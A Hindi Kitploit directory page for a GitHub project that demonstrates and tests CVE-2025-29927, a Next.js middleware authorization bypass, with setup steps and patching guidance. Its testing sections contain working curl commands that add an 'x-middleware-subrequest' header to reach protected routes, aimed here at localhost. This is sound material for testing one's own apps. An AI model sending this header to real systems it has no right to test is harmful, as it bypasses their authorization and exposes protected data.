Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
claude-create-CVE-2025-29927 — CVE-2025-29927 का परीक्षण और प्रदर्शन करता है, जो Next.js मिडलवेयर प्राधिकरण बाईपास है। इसमें शोषण और सामान्य पहुंच परीक्षण स्क्रिप्ट, साथ ही निवारण मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षालर्निंग और शिक्षा
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

CVE-2025-29927 का परीक्षण और प्रदर्शन करता है, जो Next.js मिडलवेयर प्राधिकरण बाईपास है। इसमें शोषण और सामान्य पहुंच परीक्षण स्क्रिप्ट, साथ ही निवारण मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Next.js Middleware Vulnerability Tester (CVE-2025-29927)

यह एप्लिकेशन Next.js मिडलवेयर प्राधिकरण बायपास भेद्यता (CVE-2025-29927) को प्रदर्शित करता है।

भेद्यता के बारे में

CVE-2025-29927 Next.js मिडलवेयर में एक प्राधिकरण बायपास भेद्यता है। एक विशेष रूप से तैयार किया गया HTTP हेडर (x-middleware-subrequest) भेजकर, एक हमलावर मिडलवेयर में लागू प्राधिकरण जांच को बायपास कर सकता है, संभावित रूप से संरक्षित संसाधनों तक पहुँच प्राप्त कर सकता है।

सेटअप निर्देश

  1. निर्भरताएँ स्थापित करें:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. डेवलपमेंट सर्वर चलाएँ:

    root@kitploit:~
    npm run dev
    
  3. सर्वर http://localhost:3000 पर शुरू होगा

भेद्यता का परीक्षण

सामान्य पहुँच (ब्लॉक होनी चाहिए)

संरक्षित रूट तक सामान्य रूप से पहुँचने का प्रयास करें:

root@kitploit:~
npm run test-normal

या

root@kitploit:~
curl -v http://localhost:3000/protected-data

आपको 401 अनधिकृत प्रतिक्रिया मिलनी चाहिए, क्योंकि मिडलवेयर पहुँच को ब्लॉक करता है।

भेद्यता का शोषण

एक्सप्लॉइट हेडर के साथ संरक्षित रूट तक पहुँचने का प्रयास करें:

root@kitploit:~
npm run test-exploit

या

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

यदि एप्लिकेशन असुरक्षित है, तो आपको संरक्षित डेटा के साथ 200 OK प्रतिक्रिया प्राप्त होगी।

API रूट का परीक्षण

सामान्य पहुँच (ब्लॉक होनी चाहिए):

root@kitploit:~
curl -v http://localhost:3000/api/protected

एक्सप्लॉइट के साथ:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

उपचार

इस भेद्यता को ठीक करने के लिए, आपको निम्नलिखित करना चाहिए:

  1. Next.js को पैच किए गए संस्करण में अपडेट करें:

    • Next.js 15.x: 15.2.3 या बाद के संस्करण में अपडेट करें
    • Next.js 14.x: 14.2.25 या बाद के संस्करण में अपडेट करें
    • Next.js 13.x: 13.5.9 या बाद के संस्करण में अपडेट करें
    • Next.js 12.x: 12.3.5 या बाद के संस्करण में अपडेट करें
  2. यदि आप अपडेट नहीं कर सकते, तो एक रिवर्स प्रॉक्सी (जैसे Nginx या Cloudflare) लागू करें जो इनकमिंग अनुरोधों से x-middleware-subrequest हेडर को हटा देता है।

अतिरिक्त परीक्षण कमांड

जाँचें कि क्या API रूट असुरक्षित है:

root@kitploit:~
# सामान्य अनुरोध (ब्लॉक होना चाहिए)
curl -v http://localhost:3000/api/protected

# एक्सप्लॉइट हेडर के साथ
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

अस्वीकरण

यह उपकरण केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग यह सत्यापित करने के लिए करें कि आपके अपने Next.js एप्लिकेशन असुरक्षित हैं और पैचिंग की आवश्यकता है।

टूल डाउनलोड करें